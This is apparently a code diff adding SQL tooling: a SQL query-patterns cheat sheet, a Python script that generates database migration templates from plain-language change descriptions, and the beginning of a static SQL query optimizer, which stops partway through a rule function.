SELECT e.name AS employee, m.name AS manager, e.salary, m.salary AS manager_salary
FROM employees e
JOIN employees m ON e.manager_id = m.id
WHERE e.salary > m.salary;
```
### CROSS JOIN — every combination (cartesian product)
```sql
-- Generate a calendar grid
SELECT d.date, s.shift_name
FROM dates d
CROSS JOIN shifts s;
```
Use intentionally. Accidental cartesian joins are a performance killer.
### LATERAL JOIN (PostgreSQL) — correlated subquery as a table
```sql
-- Top 3 orders per user
SELECT u.name, top_orders.*
FROM users u
CROSS JOIN LATERAL (
SELECT id, total FROM orders
WHERE user_id = u.id
ORDER BY total DESC LIMIT 3
) top_orders;
```
MySQL equivalent: use a subquery with `ROW_NUMBER()`.
---
## Common Table Expressions (CTEs)
### Basic CTE — readable subquery
```sql
WITH active_users AS (
SELECT id, name, email
FROM users
WHERE last_login > CURRENT_DATE - INTERVAL '30 days'
)
SELECT au.name, COUNT(o.id) AS recent_orders
FROM active_users au
JOIN orders o ON o.user_id = au.id
GROUP BY au.name;
```
### Multiple CTEs — chaining transformations
```sql
WITH monthly_revenue AS (
SELECT DATE_TRUNC('month', created_at) AS month, SUM(total) AS revenue
FROM orders WHERE status = 'paid'
GROUP BY 1
),
growth AS (
SELECT month, revenue,
LAG(revenue) OVER (ORDER BY month) AS prev_revenue,
ROUND((revenue - LAG(revenue) OVER (ORDER BY month)) / LAG(revenue) OVER (ORDER BY month) * 100, 1) AS growth_pct
FROM monthly_revenue
)
SELECT * FROM growth ORDER BY month;
```
### Recursive CTE — hierarchical data
```sql
-- Organization tree
WITH RECURSIVE org_tree AS (
-- Base case: top-level managers
SELECT id, name, manager_id, 0 AS depth
FROM employees WHERE manager_id IS NULL
UNION ALL
-- Recursive case: subordinates
SELECT e.id, e.name, e.manager_id, ot.depth + 1
FROM employees e
JOIN org_tree ot ON e.manager_id = ot.id
)
SELECT * FROM org_tree ORDER BY depth, name;
```
### Recursive CTE — path traversal
```sql
-- Category breadcrumb
WITH RECURSIVE breadcrumb AS (
SELECT id, name, parent_id, name::TEXT AS path
FROM categories WHERE id = 42
UNION ALL
SELECT c.id, c.name, c.parent_id, c.name || ' > ' || b.path
FROM categories c
JOIN breadcrumb b ON c.id = b.parent_id
)
SELECT path FROM breadcrumb WHERE parent_id IS NULL;
```
---
## Window Functions
### ROW_NUMBER — assign unique rank per partition
```sql
SELECT *, ROW_NUMBER() OVER (PARTITION BY department_id ORDER BY salary DESC) AS rank
FROM employees;
```
### RANK and DENSE_RANK — handle ties
```sql
-- RANK: 1, 2, 2, 4 (skips after tie)
-- DENSE_RANK: 1, 2, 2, 3 (no skip)
SELECT name, salary,
RANK() OVER (ORDER BY salary DESC) AS rank,
DENSE_RANK() OVER (ORDER BY salary DESC) AS dense_rank
FROM employees;
```
### Running total and moving average
```sql
SELECT date, amount,
SUM(amount) OVER (ORDER BY date) AS running_total,
AVG(amount) OVER (ORDER BY date ROWS BETWEEN 6 PRECEDING AND CURRENT ROW) AS moving_avg_7d
FROM daily_revenue;
```
### LAG / LEAD — access adjacent rows
```sql
SELECT date, revenue,
LAG(revenue, 1) OVER (ORDER BY date) AS prev_day,
revenue - LAG(revenue, 1) OVER (ORDER BY date) AS day_over_day_change
FROM daily_revenue;
```
### NTILE — divide into buckets
```sql
-- Split customers into quartiles by total spend
SELECT customer_id, total_spend,
NTILE(4) OVER (ORDER BY total_spend DESC) AS spend_quartile
FROM customer_summary;
```
### FIRST_VALUE / LAST_VALUE
```sql
SELECT department_id, name, salary,
FIRST_VALUE(name) OVER (PARTITION BY department_id ORDER BY salary DESC) AS highest_paid
FROM employees;
```
---
## Subquery Patterns
### EXISTS — correlated existence check
```sql
-- Users who have placed at least one order
SELECT u.* FROM users u
WHERE EXISTS (SELECT 1 FROM orders o WHERE o.user_id = u.id);
```
### NOT EXISTS — safer than NOT IN for NULLs
```sql
-- Users who have never ordered
SELECT u.* FROM users u
WHERE NOT EXISTS (SELECT 1 FROM orders o WHERE o.user_id = u.id);
```
### Scalar subquery — single value
```sql
SELECT name, salary,
salary - (SELECT AVG(salary) FROM employees) AS diff_from_avg
FROM employees;
```
### Derived table — subquery in FROM
```sql
SELECT dept, avg_salary
FROM (
SELECT department_id AS dept, AVG(salary) AS avg_salary
FROM employees GROUP BY department_id
) dept_avg
WHERE avg_salary > 100000;
```
---
## Aggregation Patterns
### GROUP BY with HAVING
```sql
-- Departments with more than 10 employees
SELECT department_id, COUNT(*) AS headcount, AVG(salary) AS avg_salary
FROM employees
GROUP BY department_id
HAVING COUNT(*) > 10;
```
### GROUPING SETS — multiple grouping levels
```sql
SELECT region, product_category, SUM(revenue)
FROM sales
GROUP BY GROUPING SETS (
(region, product_category),
(region),
(product_category),
()
);
```
### ROLLUP — hierarchical subtotals
```sql
SELECT region, city, SUM(revenue)
FROM sales
GROUP BY ROLLUP (region, city);
-- Produces: (region, city), (region), ()
```
### CUBE — all combinations
```sql
SELECT region, product, SUM(revenue)
FROM sales
GROUP BY CUBE (region, product);
```
### FILTER clause (PostgreSQL) — conditional aggregation
```sql
SELECT
COUNT(*) AS total,
COUNT(*) FILTER (WHERE status = 'paid') AS paid,
COUNT(*) FILTER (WHERE status = 'cancelled') AS cancelled,
SUM(total) FILTER (WHERE status = 'paid') AS paid_revenue
FROM orders;
```
MySQL/SQL Server equivalent: `SUM(CASE WHEN status = 'paid' THEN 1 ELSE 0 END)`.
---
## UPSERT Patterns
### PostgreSQL — ON CONFLICT
```sql
INSERT INTO user_settings (user_id, key, value, updated_at)
VALUES (1, 'theme', 'dark', NOW())
ON CONFLICT (user_id, key)
DO UPDATE SET value = EXCLUDED.value, updated_at = EXCLUDED.updated_at;
```
### MySQL — ON DUPLICATE KEY
```sql
INSERT INTO user_settings (user_id, key_name, value, updated_at)
VALUES (1, 'theme', 'dark', NOW())
ON DUPLICATE KEY UPDATE value = VALUES(value), updated_at = VALUES(updated_at);
```
### SQL Server — MERGE
```sql
MERGE INTO user_settings AS target
USING (VALUES (1, 'theme', 'dark')) AS source (user_id, key_name, value)
ON target.user_id = source.user_id AND target.key_name = source.key_name
WHEN MATCHED THEN UPDATE SET value = source.value, updated_at = GETDATE()
WHEN NOT MATCHED THEN INSERT (user_id, key_name, value, updated_at)
VALUES (source.user_id, source.key_name, source.value, GETDATE());
```
---
## JSON Operations
### PostgreSQL JSONB
```sql
-- Extract field
SELECT data->>'name' AS name FROM products WHERE data->>'category' = 'electronics';
-- Array contains
SELECT * FROM products WHERE data->'tags' ? 'sale';
-- Update nested field
UPDATE products SET data = jsonb_set(data, '{price}', '29.99') WHERE id = 1;
-- Aggregate into JSON array
SELECT jsonb_agg(jsonb_build_object('id', id, 'name', name)) FROM users;
```
### MySQL JSON
```sql
-- Extract field
SELECT JSON_EXTRACT(data, '$.name') AS name FROM products;
-- Shorthand: SELECT data->>"$.name"
-- Search in array
SELECT * FROM products WHERE JSON_CONTAINS(data->"$.tags", '"sale"');
-- Update
UPDATE products SET data = JSON_SET(data, '$.price', 29.99) WHERE id = 1;
```
---
## Pagination Patterns
### Offset pagination (simple but slow for deep pages)
```sql
SELECT * FROM products ORDER BY id LIMIT 20 OFFSET 40;
```
### Keyset pagination (fast, requires ordered unique column)
```sql
-- Page after the last seen id
SELECT * FROM products WHERE id > :last_seen_id ORDER BY id LIMIT 20;
```
### Keyset with composite sort
```sql
SELECT * FROM products
WHERE (created_at, id) < (:last_created_at, :last_id)
ORDER BY created_at DESC, id DESC
LIMIT 20;
```
---
## Bulk Operations
### Batch INSERT
```sql
INSERT INTO events (type, payload, created_at) VALUES
('click', '{"page": "/home"}', NOW()),
('view', '{"page": "/pricing"}', NOW()),
('click', '{"page": "/signup"}', NOW());
```
### Batch UPDATE with VALUES
```sql
UPDATE products AS p SET price = v.price
FROM (VALUES (1, 29.99), (2, 49.99), (3, 9.99)) AS v(id, price)
WHERE p.id = v.id;
```
### DELETE with subquery
```sql
DELETE FROM sessions
WHERE user_id IN (SELECT id FROM users WHERE deleted_at IS NOT NULL);
```
### COPY (PostgreSQL bulk load)
```sql
COPY products (name, price, category) FROM '/path/to/data.csv' WITH (FORMAT csv, HEADER true);
```
---
## Utility Patterns
### Generate series (PostgreSQL)
```sql
-- Fill date gaps
SELECT d::date FROM generate_series('2025-01-01'::date, '2025-12-31', '1 day') d;
```
### Deduplicate rows
```sql
DELETE FROM events a USING events b
WHERE a.id > b.id AND a.user_id = b.user_id AND a.event_type = b.event_type
AND a.created_at = b.created_at;
```
### Pivot (manual)
```sql
SELECT user_id,
SUM(CASE WHEN month = 1 THEN revenue END) AS jan,
SUM(CASE WHEN month = 2 THEN revenue END) AS feb,
SUM(CASE WHEN month = 3 THEN revenue END) AS mar
FROM monthly_revenue
GROUP BY user_id;
```
### Conditional INSERT (skip if exists)
```sql
INSERT INTO tags (name) SELECT 'new-tag'
WHERE NOT EXISTS (SELECT 1 FROM tags WHERE name = 'new-tag');
```

View File

@@ -0,0 +1,442 @@
#!/usr/bin/env python3
"""
Migration Generator
Generates database migration file templates (up/down) from natural-language
schema change descriptions.
Supported operations:
- Add column, drop column, rename column
- Add table, drop table, rename table
- Add index, drop index
- Add constraint, drop constraint
- Change column type
Usage:
python migration_generator.py --change "add email_verified boolean to users" --dialect postgres
python migration_generator.py --change "rename column name to full_name in customers" --format alembic
python migration_generator.py --change "add index on orders(status, created_at)" --output 001_add_index.sql
python migration_generator.py --change "create table reviews with id, user_id, rating, body" --json
"""
import argparse
import json
import os
import re
import sys
import textwrap
from dataclasses import dataclass, asdict
from datetime import datetime
from typing import List, Optional, Tuple
@dataclass
class Migration:
    """A generated migration with up and down scripts."""
    description: str  # original natural-language change description
    dialect: str  # target database dialect (postgres/mysql/sqlite/sqlserver)
    format: str  # output format name (sql/prisma/alembic)
    up: str  # formatted forward-migration text
    down: str  # formatted rollback text (may be empty, e.g. for alembic)
    warnings: List[str]  # human-readable caveats produced by the generator

    def to_dict(self) -> dict:
        """Return the migration as a plain dict (for JSON serialization)."""
        return asdict(self)
# ---------------------------------------------------------------------------
# Change parsers — extract structured intent from natural language
# ---------------------------------------------------------------------------
def parse_add_column(desc: str) -> Optional[dict]:
    """Parse: add <column> <type> to <table>

    Returns {"op", "column", "type", "table"} or None when the description
    does not match.

    The negative lookahead rejects "add [unique] index ..." phrasings:
    without it, "add unique index on users(email)" matched here first
    (column="unique", type="index") and never reached parse_add_index.
    """
    m = re.match(
        r'add\s+(?:column\s+)?(?!(?:unique|index)\b)(\w+)\s+(\w[\w(),.]*)\s+(?:to|on)\s+(\w+)',
        desc, re.IGNORECASE,
    )
    if m:
        return {"op": "add_column", "column": m.group(1), "type": m.group(2), "table": m.group(3)}
    return None
def parse_drop_column(desc: str) -> Optional[dict]:
    """Parse a 'drop/remove <column> from <table>' description."""
    pattern = r'(?:drop|remove)\s+(?:column\s+)?(\w+)\s+from\s+(\w+)'
    match = re.match(pattern, desc, re.IGNORECASE)
    if match is None:
        return None
    column, table = match.groups()
    return {"op": "drop_column", "column": column, "table": table}
def parse_rename_column(desc: str) -> Optional[dict]:
    """Parse a 'rename column <old> to <new> in <table>' description."""
    match = re.match(
        r'rename\s+column\s+(\w+)\s+to\s+(\w+)\s+in\s+(\w+)',
        desc, re.IGNORECASE,
    )
    if match is None:
        return None
    old_name, new_name, table = match.groups()
    return {"op": "rename_column", "old": old_name, "new": new_name, "table": table}
def parse_add_table(desc: str) -> Optional[dict]:
    """Parse a 'create table <name> with <col1>, <col2>, ...' description."""
    match = re.match(r'create\s+table\s+(\w+)\s+with\s+(.+)', desc, re.IGNORECASE)
    if match is None:
        return None
    table, raw_columns = match.group(1), match.group(2)
    columns = [part.strip() for part in raw_columns.split(",")]
    return {"op": "add_table", "table": table, "columns": columns}
def parse_drop_table(desc: str) -> Optional[dict]:
    """Parse a 'drop table <name>' description."""
    match = re.match(r'drop\s+table\s+(\w+)', desc, re.IGNORECASE)
    return {"op": "drop_table", "table": match.group(1)} if match else None
def parse_add_index(desc: str) -> Optional[dict]:
    """Parse: add [unique] index on <table>(<col1>, <col2>)

    The UNIQUE flag is taken from the matched 'unique' keyword itself
    (capture group 1) rather than a substring search over the whole
    description; previously a table or column whose *name* contained
    "unique" (e.g. "add index on unique_codes(code)") incorrectly
    produced a unique index.
    """
    m = re.match(
        r'add\s+(unique\s+)?index\s+(?:on\s+)?(\w+)\s*\(([^)]+)\)',
        desc, re.IGNORECASE,
    )
    if m:
        unique = m.group(1) is not None
        cols = [c.strip() for c in m.group(3).split(",")]
        return {"op": "add_index", "table": m.group(2), "columns": cols, "unique": unique}
    return None
def parse_change_type(desc: str) -> Optional[dict]:
    """Parse a 'change <column> type to <type> in <table>' description."""
    match = re.match(
        r'change\s+(?:column\s+)?(\w+)\s+type\s+to\s+(\w[\w(),.]*)\s+in\s+(\w+)',
        desc, re.IGNORECASE,
    )
    if match is None:
        return None
    column, new_type, table = match.groups()
    return {"op": "change_type", "column": column, "new_type": new_type, "table": table}
# Ordered list of parsers tried by parse_change(); the first parser that
# returns a non-None result wins, so order matters for overlapping patterns.
PARSERS = [
    parse_add_column,
    parse_drop_column,
    parse_rename_column,
    parse_add_table,
    parse_drop_table,
    parse_add_index,
    parse_change_type,
]
def parse_change(desc: str) -> Optional[dict]:
    """Try each registered parser in order; return the first structured match, else None."""
    return next(
        (parsed for parsed in (parser(desc) for parser in PARSERS) if parsed),
        None,
    )
# ---------------------------------------------------------------------------
# SQL generators per dialect
# ---------------------------------------------------------------------------
# Generic type name -> concrete column type, per dialect. Keys are the
# lower-cased type names accepted in change descriptions.
TYPE_MAP = {
    "boolean": {"postgres": "BOOLEAN", "mysql": "TINYINT(1)", "sqlite": "INTEGER", "sqlserver": "BIT"},
    "text": {"postgres": "TEXT", "mysql": "TEXT", "sqlite": "TEXT", "sqlserver": "NVARCHAR(MAX)"},
    "integer": {"postgres": "INTEGER", "mysql": "INT", "sqlite": "INTEGER", "sqlserver": "INT"},
    "int": {"postgres": "INTEGER", "mysql": "INT", "sqlite": "INTEGER", "sqlserver": "INT"},
    "serial": {"postgres": "SERIAL", "mysql": "INT AUTO_INCREMENT", "sqlite": "INTEGER", "sqlserver": "INT IDENTITY(1,1)"},
    "varchar": {"postgres": "VARCHAR(255)", "mysql": "VARCHAR(255)", "sqlite": "TEXT", "sqlserver": "NVARCHAR(255)"},
    "timestamp": {"postgres": "TIMESTAMP", "mysql": "DATETIME", "sqlite": "TEXT", "sqlserver": "DATETIME2"},
    "uuid": {"postgres": "UUID", "mysql": "CHAR(36)", "sqlite": "TEXT", "sqlserver": "UNIQUEIDENTIFIER"},
    "json": {"postgres": "JSONB", "mysql": "JSON", "sqlite": "TEXT", "sqlserver": "NVARCHAR(MAX)"},
    "decimal": {"postgres": "DECIMAL(19,4)", "mysql": "DECIMAL(19,4)", "sqlite": "REAL", "sqlserver": "DECIMAL(19,4)"},
    "float": {"postgres": "DOUBLE PRECISION", "mysql": "DOUBLE", "sqlite": "REAL", "sqlserver": "FLOAT"},
}


def map_type(type_name: str, dialect: str) -> str:
    """Map a generic type name to a dialect-specific column type.

    Unknown or parameterized types (e.g. "varchar(100)") fall through
    upper-cased, preserving any user-specified length/precision.
    """
    normalized = type_name.lower().rstrip("()")
    dialect_types = TYPE_MAP.get(normalized)
    if dialect_types and dialect in dialect_types:
        return dialect_types[dialect]
    return type_name.upper()
def gen_add_column(change: dict, dialect: str) -> Tuple[str, str, List[str]]:
    """Generate ALTER TABLE ... ADD COLUMN with a DROP COLUMN rollback."""
    table, col = change["table"], change["column"]
    sql_type = map_type(change["type"], dialect)
    return (
        f"ALTER TABLE {table} ADD COLUMN {col} {sql_type};",
        f"ALTER TABLE {table} DROP COLUMN {col};",
        [],
    )
def gen_drop_column(change: dict, dialect: str) -> Tuple[str, str, List[str]]:
    """Generate DROP COLUMN; the rollback re-adds the column as TEXT (placeholder)."""
    table, col = change["table"], change["column"]
    up = f"ALTER TABLE {table} DROP COLUMN {col};"
    down = (
        "-- WARNING: Cannot fully reverse DROP COLUMN. Provide the original type.\n"
        f"ALTER TABLE {table} ADD COLUMN {col} TEXT;"
    )
    notes = ["Down migration uses TEXT as placeholder. Replace with the original column type."]
    return up, down, notes
def gen_rename_column(change: dict, dialect: str) -> Tuple[str, str, List[str]]:
    """Generate a column rename and its inverse rename."""
    table = change["table"]
    old, new = change["old"], change["new"]
    warnings: List[str] = []
    if dialect == "sqlserver":
        # SQL Server renames via the sp_rename system procedure.
        up = f"EXEC sp_rename '{table}.{old}', '{new}', 'COLUMN';"
        down = f"EXEC sp_rename '{table}.{new}', '{old}', 'COLUMN';"
    else:
        # postgres, mysql, sqlite, and any other dialect share the
        # standard ALTER TABLE ... RENAME COLUMN syntax.
        up = f"ALTER TABLE {table} RENAME COLUMN {old} TO {new};"
        down = f"ALTER TABLE {table} RENAME COLUMN {new} TO {old};"
        if dialect == "sqlite":
            warnings.append("SQLite RENAME COLUMN requires version 3.25.0+.")
    return up, down, warnings
def gen_add_table(change: dict, dialect: str) -> Tuple[str, str, List[str]]:
    """Generate CREATE TABLE from a loose column list; rollback drops the table.

    An 'id' column expands to the dialect's auto-increment primary key;
    "name type" pairs are mapped through map_type(); bare names default
    to TEXT.
    """
    table = change["table"]
    # Dialect-specific auto-increment primary-key definitions for 'id'.
    id_definitions = {
        "postgres": "  id SERIAL PRIMARY KEY",
        "mysql": "  id INT AUTO_INCREMENT PRIMARY KEY",
        "sqlite": "  id INTEGER PRIMARY KEY AUTOINCREMENT",
        "sqlserver": "  id INT IDENTITY(1,1) PRIMARY KEY",
    }
    col_defs = []
    has_id = False
    for raw in change["columns"]:
        name = raw.strip()
        if name.lower() == "id":
            has_id = True
            if dialect in id_definitions:
                col_defs.append(id_definitions[dialect])
        else:
            # "rating int" -> mapped type; bare "body" -> TEXT fallback.
            pieces = name.split()
            if len(pieces) >= 2:
                col_defs.append(f"  {pieces[0]} {map_type(pieces[1], dialect)}")
            else:
                col_defs.append(f"  {name} TEXT")
    up = f"CREATE TABLE {table} (\n" + ",\n".join(col_defs) + "\n);"
    down = f"DROP TABLE {table};"
    warnings = [] if has_id else ["Table has no explicit primary key. Consider adding an 'id' column."]
    return up, down, warnings
def gen_drop_table(change: dict, dialect: str) -> Tuple[str, str, List[str]]:
    """Generate DROP TABLE; rollback is only a stub since the original DDL is unknown."""
    table = change["table"]
    down_stub = (
        "-- WARNING: Cannot reverse DROP TABLE without original DDL.\n"
        f"CREATE TABLE {table} (id INTEGER PRIMARY KEY);"
    )
    return (
        f"DROP TABLE {table};",
        down_stub,
        ["Down migration is a placeholder. Replace with the original CREATE TABLE statement."],
    )
def gen_add_index(change: dict, dialect: str) -> Tuple[str, str, List[str]]:
    """Generate CREATE INDEX (CONCURRENTLY on Postgres) and a matching DROP INDEX.

    Fix: SQL Server, like MySQL, requires `DROP INDEX <name> ON <table>`;
    the bare `DROP INDEX <name>;` previously emitted for sqlserver is
    invalid T-SQL.
    """
    table = change["table"]
    cols = change["columns"]
    unique = "UNIQUE " if change.get("unique") else ""
    idx_name = f"idx_{table}_{'_'.join(cols)}"
    col_list = ", ".join(cols)
    if dialect == "postgres":
        # CONCURRENTLY avoids blocking writes while the index builds.
        up = f"CREATE {unique}INDEX CONCURRENTLY {idx_name} ON {table} ({col_list});"
    else:
        up = f"CREATE {unique}INDEX {idx_name} ON {table} ({col_list});"
    if dialect in ("mysql", "sqlserver"):
        down = f"DROP INDEX {idx_name} ON {table};"
    else:
        down = f"DROP INDEX {idx_name};"
    warnings = []
    if dialect == "postgres":
        warnings.append("CONCURRENTLY cannot run inside a transaction. Run outside migration transaction.")
    return up, down, warnings
def gen_change_type(change: dict, dialect: str) -> Tuple[str, str, List[str]]:
    """Generate a column type change; rollback uses a TEXT-ish placeholder type."""
    table, col = change["table"], change["column"]
    new_type = map_type(change["new_type"], dialect)
    warnings = ["Down migration uses TEXT as placeholder. Replace with the original column type."]
    if dialect == "postgres":
        up = f"ALTER TABLE {table} ALTER COLUMN {col} TYPE {new_type};"
        down = f"ALTER TABLE {table} ALTER COLUMN {col} TYPE TEXT;"
    elif dialect == "mysql":
        up = f"ALTER TABLE {table} MODIFY COLUMN {col} {new_type};"
        down = f"ALTER TABLE {table} MODIFY COLUMN {col} TEXT;"
    elif dialect == "sqlserver":
        up = f"ALTER TABLE {table} ALTER COLUMN {col} {new_type};"
        down = f"ALTER TABLE {table} ALTER COLUMN {col} NVARCHAR(MAX);"
    else:
        # SQLite has no ALTER COLUMN; the whole table must be rebuilt.
        stub = "-- SQLite does not support ALTER COLUMN. Recreate the table."
        up = stub
        down = stub
        warnings.append("SQLite requires table recreation for type changes.")
    return up, down, warnings
# Dispatch table: parsed operation name -> generator(change, dialect).
# Each generator returns (up_sql, down_sql, warnings).
GENERATORS = {
    "add_column": gen_add_column,
    "drop_column": gen_drop_column,
    "rename_column": gen_rename_column,
    "add_table": gen_add_table,
    "drop_table": gen_drop_table,
    "add_index": gen_add_index,
    "change_type": gen_change_type,
}
# ---------------------------------------------------------------------------
# Format wrappers
# ---------------------------------------------------------------------------
def wrap_sql(up: str, down: str, description: str) -> Tuple[str, str]:
    """Wrap up/down SQL as two plain .sql migration bodies with a shared header.

    Fix: removed the dead `timestamp` local — it was computed via
    strftime but never used (the header uses isoformat()).
    """
    header = (
        f"-- Migration: {description}\n"
        f"-- Generated: {datetime.now().isoformat()}\n\n"
    )
    return header + "-- Up\n" + up, header + "-- Down\n" + down
def wrap_prisma(up: str, down: str, description: str) -> Tuple[str, str]:
    """Format as Prisma migration SQL (Prisma stores raw SQL in migration.sql)."""
    header_lines = [f"-- Migration: {description}", "-- Format: Prisma (migration.sql)", "", ""]
    header = "\n".join(header_lines)
    return header + up, header + "-- Rollback\n" + down
def wrap_alembic(up: str, down: str, description: str) -> Tuple[str, str]:
    """Format as an Alembic Python migration module.

    Returns (module_source, ""): the rollback lives inside the module's
    downgrade(), so there is no separate down file.

    Fixes over the previous version:
    - The SQL was interpolated into an f-string *before* textwrap.dedent()
      ran, so the indented multi-line SQL changed the common leading
      whitespace and the emitted module came out mis-indented. The module
      is now assembled line by line with the SQL indented explicitly.
    - Removed the unused `slug` local.
    """
    revision = datetime.now().strftime("%Y%m%d%H%M")
    body_up = textwrap.indent(up, "        ")
    body_down = textwrap.indent(down, "        ")
    module_lines = [
        '"""',
        description,
        f"Revision ID: {revision}",
        '"""',
        "from alembic import op",
        "import sqlalchemy as sa",
        "",
        f"revision = '{revision}'",
        "down_revision = None  # Set to previous revision",
        "",
        "",
        "def upgrade():",
        '    op.execute("""',
        body_up,
        '    """)',
        "",
        "",
        "def downgrade():",
        '    op.execute("""',
        body_down,
        '    """)',
    ]
    return "\n".join(module_lines) + "\n", ""
# Output-format wrappers: each takes (up, down, description) and returns the
# formatted (up_text, down_text) pair. The alembic wrapper returns "" for
# down because the rollback is embedded in the migration module itself.
FORMATTERS = {
    "sql": wrap_sql,
    "prisma": wrap_prisma,
    "alembic": wrap_alembic,
}
# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def main():
    """CLI entry point: parse a schema-change description, generate the
    up/down migration, format it, and print or write the result.

    Fix: the rollback path was derived with
    `args.output.replace(".sql", "_down.sql")`, which produced the SAME
    path as the up migration (silently overwriting it) whenever --output
    did not contain ".sql". The path is now built with os.path.splitext.
    """
    parser = argparse.ArgumentParser(
        description="Generate database migration templates from change descriptions.",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Supported change descriptions:
  "add email_verified boolean to users"
  "drop column legacy_flag from accounts"
  "rename column name to full_name in customers"
  "create table reviews with id, user_id, rating int, body text"
  "drop table temp_imports"
  "add index on orders(status, created_at)"
  "add unique index on users(email)"
  "change email type to varchar in users"
Examples:
  %(prog)s --change "add phone varchar to users" --dialect postgres
  %(prog)s --change "create table reviews with id, user_id, rating int, body" --format prisma
  %(prog)s --change "add index on orders(status)" --output migrations/001.sql --json
""",
    )
    parser.add_argument("--change", required=True, help="Natural-language description of the schema change")
    parser.add_argument("--dialect", choices=["postgres", "mysql", "sqlite", "sqlserver"],
                        default="postgres", help="Target database dialect (default: postgres)")
    parser.add_argument("--format", choices=["sql", "prisma", "alembic"], default="sql",
                        dest="fmt", help="Output format (default: sql)")
    parser.add_argument("--output", help="Write migration to file instead of stdout")
    parser.add_argument("--json", action="store_true", dest="json_output", help="Output as JSON")
    args = parser.parse_args()

    # Turn the natural-language description into a structured change dict.
    change = parse_change(args.change)
    if not change:
        print(f"Error: Could not parse change description: '{args.change}'", file=sys.stderr)
        print("Run with --help to see supported patterns.", file=sys.stderr)
        sys.exit(1)

    gen_fn = GENERATORS.get(change["op"])
    if not gen_fn:
        print(f"Error: No generator for operation '{change['op']}'", file=sys.stderr)
        sys.exit(1)

    up, down, warnings = gen_fn(change, args.dialect)
    fmt_fn = FORMATTERS[args.fmt]
    up_formatted, down_formatted = fmt_fn(up, down, args.change)

    migration = Migration(
        description=args.change,
        dialect=args.dialect,
        format=args.fmt,
        up=up_formatted,
        down=down_formatted,
        warnings=warnings,
    )

    if args.json_output:
        print(json.dumps(migration.to_dict(), indent=2))
    else:
        if args.output:
            with open(args.output, "w") as f:
                f.write(migration.up)
            print(f"Migration written to {args.output}")
            if migration.down:
                # Derive "<base>_down<ext>" from the real extension so the
                # rollback never collides with the up-migration file.
                base, ext = os.path.splitext(args.output)
                down_path = f"{base}_down{ext or '.sql'}"
                with open(down_path, "w") as f:
                    f.write(migration.down)
                print(f"Rollback written to {down_path}")
        else:
            print(migration.up)
            if migration.down:
                print("\n" + "=" * 40 + " ROLLBACK " + "=" * 40 + "\n")
                print(migration.down)
        if warnings:
            print("\nWarnings:")
            for w in warnings:
                print(f"  - {w}")


if __name__ == "__main__":
    main()

View File

@@ -0,0 +1,348 @@
#!/usr/bin/env python3
"""
SQL Query Optimizer — Static Analysis
Analyzes SQL queries for common performance issues:
- SELECT * usage
- Missing WHERE clauses on UPDATE/DELETE
- Cartesian joins (missing JOIN conditions)
- Subqueries in SELECT list
- Missing LIMIT on unbounded SELECTs
- Function calls on indexed columns (non-sargable)
- LIKE with leading wildcard
- ORDER BY RAND()
- UNION instead of UNION ALL
- NOT IN with subquery (NULL-unsafe)
Usage:
python query_optimizer.py --query "SELECT * FROM users"
python query_optimizer.py --query queries.sql --dialect postgres
python query_optimizer.py --query "SELECT * FROM orders" --json
"""
import argparse
import json
import os
import re
import sys
from dataclasses import dataclass, asdict
from typing import List, Optional
@dataclass
class Issue:
    """A single optimization issue found in a query."""
    severity: str  # critical, warning, info
    rule: str  # short rule identifier, e.g. "select-star"
    message: str  # what is wrong
    suggestion: str  # how to fix it
    line: Optional[int] = None  # 1-based line number when known


@dataclass
class QueryAnalysis:
    """Analysis result for one SQL query."""
    query: str
    issues: List[Issue]
    score: int  # 0-100, higher is better

    def to_dict(self) -> dict:
        """Serialize for JSON output, truncating long query text to 200 chars."""
        text = self.query
        preview = text if len(text) <= 200 else text[:200] + "..."
        return {
            "query": preview,
            "issues": [asdict(issue) for issue in self.issues],
            "issue_count": len(self.issues),
            "score": self.score,
        }
# ---------------------------------------------------------------------------
# Rule checkers
# ---------------------------------------------------------------------------
def check_select_star(sql: str) -> Optional[Issue]:
"""Detect SELECT * usage."""
if re.search(r'\bSELECT\s+\*\s', sql, re.IGNORECASE):
return Issue(
severity="warning",
rule="select-star",
message="SELECT * transfers unnecessary data and breaks on schema changes.",
suggestion="List only the columns you need: SELECT col1, col2, ...",
)
return None
def check_missing_where(sql: str) -> Optional[Issue]:
"""Detect UPDATE/DELETE without WHERE."""
upper = sql.upper().strip()
for keyword in ("UPDATE", "DELETE"):
if upper.startswith(keyword) and "WHERE" not in upper:
return Issue(
severity="critical",
rule="missing-where",
message=f"{keyword} without WHERE affects every row in the table.",
suggestion=f"Add a WHERE clause to restrict the {keyword} scope.",
)
return None
def check_cartesian_join(sql: str) -> Optional[Issue]:
"""Detect comma-separated tables without explicit JOIN or WHERE join condition."""
upper = sql.upper()
if "SELECT" not in upper:
return None
from_match = re.search(r'\bFROM\s+(.+?)(?:\bWHERE\b|\bGROUP\b|\bORDER\b|\bLIMIT\b|\bHAVING\b|;|$)',
sql, re.IGNORECASE | re.DOTALL)
if not from_match:
return None
from_clause = from_match.group(1)
# Skip if explicit JOINs are used
if re.search(r'\bJOIN\b', from_clause, re.IGNORECASE):
return None
# Count comma-separated tables
tables = [t.strip() for t in from_clause.split(",") if t.strip()]
if len(tables) > 1 and "WHERE" not in upper:
return Issue(
severity="critical",
rule="cartesian-join",
message="Multiple tables in FROM without JOIN or WHERE creates a cartesian product.",
suggestion="Use explicit JOIN syntax with ON conditions.",
)
return None
def check_subquery_in_select(sql: str) -> Optional[Issue]:
"""Detect correlated subqueries in SELECT list."""
select_match = re.search(r'\bSELECT\b(.+?)\bFROM\b', sql, re.IGNORECASE | re.DOTALL)
if select_match:
select_clause = select_match.group(1)
if re.search(r'\(\s*SELECT\b', select_clause, re.IGNORECASE):
return Issue(
severity="warning",
rule="subquery-in-select",
message="Subquery in SELECT list executes once per row (correlated subquery).",
suggestion="Rewrite as a LEFT JOIN with aggregation.",
)
return None
def check_missing_limit(sql: str) -> Optional[Issue]:
"""Detect unbounded SELECT without LIMIT."""
upper = sql.upper().strip()
if not upper.startswith("SELECT"):
return None
# Skip if it's a subquery or aggregate-only
if re.search(r'\bCOUNT\s*\(', upper) and "GROUP BY" not in upper:
return None
if "LIMIT" not in upper and "FETCH" not in upper and "TOP " not in upper:
return Issue(
severity="info",
rule="missing-limit",
message="SELECT without LIMIT may return unbounded rows.",
suggestion="Add LIMIT to prevent returning excessive data.",
)
return None
def check_function_on_column(sql: str) -> Optional[Issue]:
"""Detect function calls on columns in WHERE (non-sargable)."""
